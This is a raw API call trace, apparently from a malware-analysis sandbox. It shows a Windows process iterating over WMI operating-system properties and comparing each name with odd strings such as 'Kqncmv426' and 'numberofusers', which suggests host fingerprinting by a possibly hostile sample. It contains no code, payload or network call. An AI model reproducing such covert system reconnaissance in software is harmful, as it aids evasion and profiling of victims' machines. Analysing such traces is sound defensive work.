[0044.366] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.366] IWbemClassObject:Get (in: This=0x223a1e8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="BuildType", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.366] IWbemClassObject:Get (in: This=0x223a1e8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="BuildType", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CodeSet", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.366] lstrlenW (lpString="CodeSet") returned 7
[0044.366] lstrlenW (lpString="Kqncmv426") returned 9
[0044.366] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="CodeSet", cchCount2=7) returned 3
[0044.366] lstrlenW (lpString="CodeSet") returned 7
[0044.366] lstrlenW (lpString="lgiet286a") returned 9
[0044.366] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="CodeSet", cchCount2=7) returned 3
[0044.366] lstrlenW (lpString="CodeSet") returned 7
[0044.366] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.366] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="CodeSet", cchCount2=7) returned 3
[0044.366] lstrlenW (lpString="CodeSet") returned 7
[0044.366] lstrlenW (lpString="numberofusers") returned 13
[0044.366] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="CodeSet", cchCount2=7) returned 3
[0044.366] IUnknown:Release (This=0x223a1e8) returned 0x1
[0044.366] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.367] IWbemClassObject:Get (in: This=0x223a6c8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CodeSet", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.367] IWbemClassObject:Get (in: This=0x223a6c8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CodeSet", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CountryCode", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.367] lstrlenW (lpString="CountryCode") returned 11
[0044.367] lstrlenW (lpString="Kqncmv426") returned 9
[0044.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="CountryCode", cchCount2=11) returned 3
[0044.367] lstrlenW (lpString="CountryCode") returned 11
[0044.367] lstrlenW (lpString="lgiet286a") returned 9
[0044.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="CountryCode", cchCount2=11) returned 3
[0044.367] lstrlenW (lpString="CountryCode") returned 11
[0044.367] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="CountryCode", cchCount2=11) returned 3
[0044.367] lstrlenW (lpString="CountryCode") returned 11
[0044.367] lstrlenW (lpString="numberofusers") returned 13
[0044.367] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="CountryCode", cchCount2=11) returned 3
[0044.367] IUnknown:Release (This=0x223a6c8) returned 0x1
[0044.367] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.367] IWbemClassObject:Get (in: This=0x223abd0, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CountryCode", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.367] IWbemClassObject:Get (in: This=0x223abd0, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CountryCode", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CSDVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.368] lstrlenW (lpString="CSDVersion") returned 10
[0044.368] lstrlenW (lpString="Kqncmv426") returned 9
[0044.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="CSDVersion", cchCount2=10) returned 3
[0044.368] lstrlenW (lpString="CSDVersion") returned 10
[0044.368] lstrlenW (lpString="lgiet286a") returned 9
[0044.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="CSDVersion", cchCount2=10) returned 3
[0044.368] lstrlenW (lpString="CSDVersion") returned 10
[0044.368] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="CSDVersion", cchCount2=10) returned 3
[0044.368] lstrlenW (lpString="CSDVersion") returned 10
[0044.368] lstrlenW (lpString="numberofusers") returned 13
[0044.368] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="CSDVersion", cchCount2=10) returned 3
[0044.368] IUnknown:Release (This=0x223abd0) returned 0x1
[0044.368] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.368] IWbemClassObject:Get (in: This=0x223af20, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CSDVersion", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.368] IWbemClassObject:Get (in: This=0x223af20, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CSDVersion", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CSName", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.368] lstrlenW (lpString="CSName") returned 6
[0044.368] lstrlenW (lpString="Kqncmv426") returned 9
[0044.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="CSName", cchCount2=6) returned 3
[0044.369] lstrlenW (lpString="CSName") returned 6
[0044.369] lstrlenW (lpString="lgiet286a") returned 9
[0044.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="CSName", cchCount2=6) returned 3
[0044.369] lstrlenW (lpString="CSName") returned 6
[0044.369] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="CSName", cchCount2=6) returned 3
[0044.369] lstrlenW (lpString="CSName") returned 6
[0044.369] lstrlenW (lpString="numberofusers") returned 13
[0044.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="CSName", cchCount2=6) returned 3
[0044.369] IUnknown:Release (This=0x223af20) returned 0x1
[0044.369] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.369] IWbemClassObject:Get (in: This=0x223b358, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CSName", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.369] IWbemClassObject:Get (in: This=0x223b358, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CSName", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CurrentTimeZone", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.369] lstrlenW (lpString="CurrentTimeZone") returned 15
[0044.369] lstrlenW (lpString="Kqncmv426") returned 9
[0044.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="CurrentTimeZone", cchCount2=15) returned 3
[0044.369] lstrlenW (lpString="CurrentTimeZone") returned 15
[0044.369] lstrlenW (lpString="lgiet286a") returned 9
[0044.369] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="CurrentTimeZone", cchCount2=15) returned 3
[0044.369] lstrlenW (lpString="CurrentTimeZone") returned 15
[0044.370] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="CurrentTimeZone", cchCount2=15) returned 3
[0044.370] lstrlenW (lpString="CurrentTimeZone") returned 15
[0044.370] lstrlenW (lpString="numberofusers") returned 13
[0044.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="CurrentTimeZone", cchCount2=15) returned 3
[0044.370] IUnknown:Release (This=0x223b358) returned 0x1
[0044.370] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.370] IWbemClassObject:Get (in: This=0x223b8f8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="CurrentTimeZone", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.370] IWbemClassObject:Get (in: This=0x223b8f8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="CurrentTimeZone", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Debug", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.370] lstrlenW (lpString="Debug") returned 5
[0044.370] lstrlenW (lpString="Kqncmv426") returned 9
[0044.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Debug", cchCount2=5) returned 3
[0044.370] lstrlenW (lpString="Debug") returned 5
[0044.370] lstrlenW (lpString="lgiet286a") returned 9
[0044.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Debug", cchCount2=5) returned 3
[0044.370] lstrlenW (lpString="Debug") returned 5
[0044.370] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Debug", cchCount2=5) returned 3
[0044.370] lstrlenW (lpString="Debug") returned 5
[0044.370] lstrlenW (lpString="numberofusers") returned 13
[0044.370] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Debug", cchCount2=5) returned 3
[0044.371] IUnknown:Release (This=0x223b8f8) returned 0x1
[0044.371] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.371] IWbemClassObject:Get (in: This=0x223bd60, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Debug", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.371] IWbemClassObject:Get (in: This=0x223bd60, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Debug", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Description", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.371] lstrlenW (lpString="Description") returned 11
[0044.371] lstrlenW (lpString="Kqncmv426") returned 9
[0044.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Description", cchCount2=11) returned 3
[0044.371] lstrlenW (lpString="Description") returned 11
[0044.371] lstrlenW (lpString="lgiet286a") returned 9
[0044.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Description", cchCount2=11) returned 3
[0044.371] lstrlenW (lpString="Description") returned 11
[0044.371] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Description", cchCount2=11) returned 3
[0044.371] lstrlenW (lpString="Description") returned 11
[0044.371] lstrlenW (lpString="numberofusers") returned 13
[0044.371] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Description", cchCount2=11) returned 3
[0044.371] IUnknown:Release (This=0x223bd60) returned 0x1
[0044.371] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.371] IWbemClassObject:Get (in: This=0x223bef8, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Description", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.371] IWbemClassObject:Get (in: This=0x223bef8, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Description", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Distributed", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.372] lstrlenW (lpString="Distributed") returned 11
[0044.372] lstrlenW (lpString="Kqncmv426") returned 9
[0044.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="Distributed", cchCount2=11) returned 3
[0044.372] lstrlenW (lpString="Distributed") returned 11
[0044.372] lstrlenW (lpString="lgiet286a") returned 9
[0044.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="Distributed", cchCount2=11) returned 3
[0044.372] lstrlenW (lpString="Distributed") returned 11
[0044.372] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="Distributed", cchCount2=11) returned 3
[0044.372] lstrlenW (lpString="Distributed") returned 11
[0044.372] lstrlenW (lpString="numberofusers") returned 13
[0044.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="Distributed", cchCount2=11) returned 3
[0044.372] IUnknown:Release (This=0x223bef8) returned 0x1
[0044.372] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.372] IWbemClassObject:Get (in: This=0x223c090, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="Distributed", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.372] IWbemClassObject:Get (in: This=0x223c090, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="Distributed", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="EncryptionLevel", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.372] lstrlenW (lpString="EncryptionLevel") returned 15
[0044.372] lstrlenW (lpString="Kqncmv426") returned 9
[0044.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="EncryptionLevel", cchCount2=15) returned 3
[0044.372] lstrlenW (lpString="EncryptionLevel") returned 15
[0044.372] lstrlenW (lpString="lgiet286a") returned 9
[0044.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="EncryptionLevel", cchCount2=15) returned 3
[0044.372] lstrlenW (lpString="EncryptionLevel") returned 15
[0044.372] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="EncryptionLevel", cchCount2=15) returned 3
[0044.372] lstrlenW (lpString="EncryptionLevel") returned 15
[0044.372] lstrlenW (lpString="numberofusers") returned 13
[0044.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="EncryptionLevel", cchCount2=15) returned 3
[0044.373] IUnknown:Release (This=0x223c090) returned 0x1
[0044.373] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.373] IWbemClassObject:Get (in: This=0x223c228, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="EncryptionLevel", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.373] IWbemClassObject:Get (in: This=0x223c228, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="EncryptionLevel", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="ForegroundApplicationBoost", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.373] lstrlenW (lpString="ForegroundApplicationBoost") returned 26
[0044.373] lstrlenW (lpString="Kqncmv426") returned 9
[0044.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="ForegroundApplicationBoost", cchCount2=26) returned 3
[0044.373] lstrlenW (lpString="ForegroundApplicationBoost") returned 26
[0044.373] lstrlenW (lpString="lgiet286a") returned 9
[0044.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="ForegroundApplicationBoost", cchCount2=26) returned 3
[0044.373] lstrlenW (lpString="ForegroundApplicationBoost") returned 26
[0044.373] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="ForegroundApplicationBoost", cchCount2=26) returned 3
[0044.373] lstrlenW (lpString="ForegroundApplicationBoost") returned 26
[0044.373] lstrlenW (lpString="numberofusers") returned 13
[0044.373] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="ForegroundApplicationBoost", cchCount2=26) returned 3
[0044.373] IUnknown:Release (This=0x223c228) returned 0x1
[0044.373] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.373] IWbemClassObject:Get (in: This=0x223c3c0, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="ForegroundApplicationBoost", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.373] IWbemClassObject:Get (in: This=0x223c3c0, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="ForegroundApplicationBoost", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="FreePhysicalMemory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.373] lstrlenW (lpString="FreePhysicalMemory") returned 18
[0044.374] lstrlenW (lpString="Kqncmv426") returned 9
[0044.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="FreePhysicalMemory", cchCount2=18) returned 3
[0044.374] lstrlenW (lpString="FreePhysicalMemory") returned 18
[0044.374] lstrlenW (lpString="lgiet286a") returned 9
[0044.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="FreePhysicalMemory", cchCount2=18) returned 3
[0044.374] lstrlenW (lpString="FreePhysicalMemory") returned 18
[0044.374] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="FreePhysicalMemory", cchCount2=18) returned 3
[0044.374] lstrlenW (lpString="FreePhysicalMemory") returned 18
[0044.374] lstrlenW (lpString="numberofusers") returned 13
[0044.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="FreePhysicalMemory", cchCount2=18) returned 3
[0044.374] IUnknown:Release (This=0x223c3c0) returned 0x1
[0044.374] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.374] IWbemClassObject:Get (in: This=0x223c558, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="FreePhysicalMemory", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.374] IWbemClassObject:Get (in: This=0x223c558, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="FreePhysicalMemory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="FreeSpaceInPagingFiles", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.374] lstrlenW (lpString="FreeSpaceInPagingFiles") returned 22
[0044.374] lstrlenW (lpString="Kqncmv426") returned 9
[0044.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="FreeSpaceInPagingFiles", cchCount2=22) returned 3
[0044.374] lstrlenW (lpString="FreeSpaceInPagingFiles") returned 22
[0044.374] lstrlenW (lpString="lgiet286a") returned 9
[0044.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="FreeSpaceInPagingFiles", cchCount2=22) returned 3
[0044.374] lstrlenW (lpString="FreeSpaceInPagingFiles") returned 22
[0044.374] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="FreeSpaceInPagingFiles", cchCount2=22) returned 3
[0044.374] lstrlenW (lpString="FreeSpaceInPagingFiles") returned 22
[0044.374] lstrlenW (lpString="numberofusers") returned 13
[0044.374] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="FreeSpaceInPagingFiles", cchCount2=22) returned 3
[0044.375] IUnknown:Release (This=0x223c558) returned 0x1
[0044.375] SafeArrayGetElement (in: psa=0x236ee8, rgIndices=0x12f988, pv=0x12f9b4 | out: pv=0x12f9b4) returned 0x0
[0044.375] IWbemClassObject:Get (in: This=0x223c6f0, wszName="Name", lFlags=0, pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="FreeSpaceInPagingFiles", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8e8*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="FreeVirtualMemory", varVal2=0x4de892ed), pType=0x0, plFlavor=0x0) returned 0x0
[0044.375] IWbemClassObject:Get (in: This=0x223c6f0, wszName="Derivation", lFlags=0, pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="FreeSpaceInPagingFiles", varVal2=0x757098cd), pType=0x0, plFlavor=0x0 | out: pVal=0x12f8d8*(varType=0x8, wReserved1=0x0, wReserved2=0xf0f0, wReserved3=0x18, varVal1="FreeVirtualMemory", varVal2=0x757098cd), pType=0x0, plFlavor=0x0) returned 0x0
[0044.375] lstrlenW (lpString="FreeVirtualMemory") returned 17
[0044.375] lstrlenW (lpString="Kqncmv426") returned 9
[0044.375] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Kqncmv426", cchCount1=9, lpString2="FreeVirtualMemory", cchCount2=17) returned 3
[0044.375] lstrlenW (lpString="FreeVirtualMemory") returned 17
[0044.375] lstrlenW (lpString="lgiet286a") returned 9
[0044.375] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="lgiet286a", cchCount1=9, lpString2="FreeVirtualMemory", cchCount2=17) returned 3
[0044.375] lstrlenW (lpString="FreeVirtualMemory") returned 17
[0044.375] lstrlenW (lpString="UUFIKrncm") returned 9
[0044.375] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="UUFIKrncm", cchCount1=9, lpString2="FreeVirtualMemory", cchCount2=17) returned 3
[0044.375] lstrlenW (lpString="FreeVirtualMemory") returned 17
[0044.375] lstrlenW (lpString="numberofusers") returned 13
[0044.375] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="numberofusers", cchCount1=13, lpString2="FreeVirtualMemory", cchCount2=17) returned 3
[0044.375] IUnknown:Release (This=0x223c6f0) returned 0x1
